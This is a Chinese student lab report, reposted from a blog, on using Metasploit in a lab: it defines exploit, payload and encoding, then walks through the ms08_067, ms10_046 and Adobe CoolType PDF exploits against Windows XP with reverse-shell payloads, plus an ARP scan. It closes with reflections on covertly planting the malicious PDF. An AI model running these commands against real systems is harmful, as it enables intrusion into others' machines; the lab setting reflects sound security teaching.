20155216 Exp5 MSF基础应用
Exp5 MSF基礎(chǔ)應(yīng)用
基礎(chǔ)問題回答
- 1、用自己的話解釋什么是exploit,payload,encode?
exploit :
Exploit的英文意思就是利用,在做攻擊時(shí),通常稱為漏洞利用。
一個(gè)利用程序(An exploit)就是一段通過觸發(fā)一個(gè)漏洞(或者幾個(gè)漏洞)進(jìn)而控制目標(biāo)系統(tǒng)的代碼。
exploits利用代碼可以在本地也可在遠(yuǎn)程進(jìn)行。一個(gè)遠(yuǎn)程攻擊利用允許攻擊者遠(yuǎn)程操縱計(jì)算機(jī),理想狀態(tài)下能夠執(zhí)行任意代碼。
payload :
payload屬于名詞,意為有效載荷,在病毒代碼中實(shí)現(xiàn)一些有害的或者惡性的動(dòng)作的部分叫做“有效負(fù)載”(payload)。
payload可以實(shí)現(xiàn)任何運(yùn)行在受害者環(huán)境中的程序所能做的事情,并且能夠執(zhí)行動(dòng)作包括破壞文件刪除文件,向病毒的作者或者任意的接收者發(fā)送敏感信息,以及提供通向被感染計(jì)算機(jī)的后門。
encode :
encode本意為編碼,可在不改變payload功能的情況下對(duì)其進(jìn)行編碼,一些好的編碼方式可以使攻擊或相關(guān)的文件不被發(fā)現(xiàn)。
實(shí)踐內(nèi)容
一、主動(dòng)攻擊:ms08_067漏洞攻擊
攻擊機(jī): kali linux x64
靶機(jī): windows XP SP3(English)
實(shí)驗(yàn)前準(zhǔn)備:將windows XP的防火墻關(guān)閉;進(jìn)入msfconsole界面。
1、先用 search ms08_067 指令查詢針對(duì)該漏洞可以運(yùn)用的攻擊模塊:
根據(jù)提示,使用 use exploit/windows/smb/ms08_067_netapi 使用該模塊,并使用 show payloads 查看可以供我們使用的payload:
可查看到有很多可以使用的正常的payload。
2、選擇通過反向連接來獲取shell的 generic/shell_reverse_tcp 作為payload,使用指令 set payload generic/shell_reverse_tcp 對(duì)payload進(jìn)行設(shè)置,并使用 show options 查看:
3、發(fā)現(xiàn)源端口和目的端口是默認(rèn)固定的,需要設(shè)置一個(gè)RHOST(靶機(jī)的IP地址)和一個(gè)LHOST(攻擊機(jī)的IP地址):
使用 show options 查看設(shè)置結(jié)果:
4、接著使用 exploit 指令開始攻擊:
5、攻擊成功后獲取了靶機(jī)的shell,此時(shí)可使用 systeminfo 指令查看靶機(jī)系統(tǒng)信息:
二、對(duì)瀏覽器攻擊:ms10_046漏洞攻擊
1、利用search ms10_046指令查看可以運(yùn)用的攻擊模塊:
2、根據(jù)提示,使用 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 使用該模塊,并使用show payloads查看:
3、使用 set payload windows/meterpreter/reverse_tcp 設(shè)置payload,并使用show options查看參數(shù):
SRVHOST填的是本地監(jiān)聽主機(jī)的IP地址,LHOST也是監(jiān)聽的IP地址,所以這里SRVHOST和LHOST都應(yīng)該填攻擊機(jī)的IP地址:
4、使用xp系統(tǒng)打開鏈接: http://192.168.52.131:80/ :
此時(shí)kali顯示接入一個(gè)會(huì)話:
5、使用 sessions -i 1 選擇會(huì)話1,成功獲取了靶機(jī)的shell,利用 systeminfo 指令查看靶機(jī)的系統(tǒng)信息:
三、對(duì)Adobe的漏洞攻擊
1、先使用search adobe查詢和adobe漏洞有關(guān)的模塊:
2、個(gè)人選擇: exploit/windows/fileformat/adobe_cooltype_sing ,然后show payloads查看payload:
3、選擇 windows/meterpreter/reverse_tcp ,并使用show options查看參數(shù):
只需建立本地主機(jī)IP:LHOST,輸入 exploit 將在固定的位置生成相應(yīng)的文件:
5、在文件查看處選擇顯示隱藏文件,在相應(yīng)的位置找到msf.pdf:
6、將文件拷貝至windows XP下,并在kali下輸入:
use exploit/multi/handler set LHOST 192.168.52.131 set LPORT 4444 exploit7、將win XP下的PDF打開,攻擊機(jī)成功獲取到靶機(jī)shell:
四、輔助模塊的應(yīng)用
1、使用 show auxiliary 查看可以運(yùn)用的輔助模塊:
選擇ARP掃描,使用命令: use scanner/discovery/arp_sweep ,并使用show options查看參數(shù):
只需設(shè)置目的主機(jī)IP即可:
也可設(shè)置一個(gè)網(wǎng)段進(jìn)行掃描:
實(shí)驗(yàn)總結(jié)與體會(huì)
通過本次實(shí)驗(yàn),再一次領(lǐng)略了MSF平臺(tái)功能的豐富和強(qiáng)大。不但可以攻擊很多方面的漏洞,還有很多各種各樣的輔助功能,光是掃描就有特別多種,幾乎覆蓋了所有的掃描方式。但也在實(shí)驗(yàn)過程中發(fā)現(xiàn)了MSF的局限性與落后性。在針對(duì)系統(tǒng)的攻擊方面,只能攻擊windows XP系統(tǒng),對(duì)win7系統(tǒng)的攻擊嘗試無效。并且針對(duì)瀏覽器的攻擊也只能攻擊IE8及以下的版本,甚至有些連IE8也攻擊不了,所以在實(shí)際應(yīng)用中存在非常大的局限性。
當(dāng)然,通過對(duì)MSF攻擊的學(xué)習(xí),我們對(duì)一些理論課上學(xué)到的一些攻擊付諸實(shí)踐,對(duì)于滲透測(cè)試有了更深的理解。若要將攻擊運(yùn)用到實(shí)踐中,還需不斷地研究各類新型的漏洞,并獲取更高的權(quán)限對(duì)其他主機(jī)進(jìn)行掃描和注入。
離實(shí)戰(zhàn)還缺些什么技術(shù)或步驟?
1、在實(shí)踐中發(fā)現(xiàn)MSF攻擊的局限性很大,其中的漏洞幾乎都是針對(duì)win XP系統(tǒng),而實(shí)際應(yīng)用的系統(tǒng)大部分是win7及以上的系統(tǒng),如果需要實(shí)戰(zhàn)攻擊win7及以上的系統(tǒng),還需要不斷發(fā)現(xiàn)并成功利用新的漏洞。
2、需要提高掃描等信息收集技術(shù),信息收集是做攻擊的重要前提,但大多數(shù)初級(jí)的掃描都會(huì)被win7及以上的系統(tǒng)發(fā)現(xiàn)甚至拒絕,所以提供相應(yīng)的技術(shù)很重要。
3、在對(duì)Adobe的漏洞攻擊中,需要把PDF文件植入被攻擊主機(jī),如果在不被發(fā)現(xiàn)植入危險(xiǎn)的文件的情況下成功將攻擊所需文件植入靶機(jī),也是一個(gè)值得深思的問題。
轉(zhuǎn)載于:https://www.cnblogs.com/LeeX1997/p/8920919.html
總結(jié)
以上是生活随笔為你收集整理的20155216 Exp5 MSF基础应用的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 基于Spring读写分离
- 下一篇: java web开发小记(6)将int类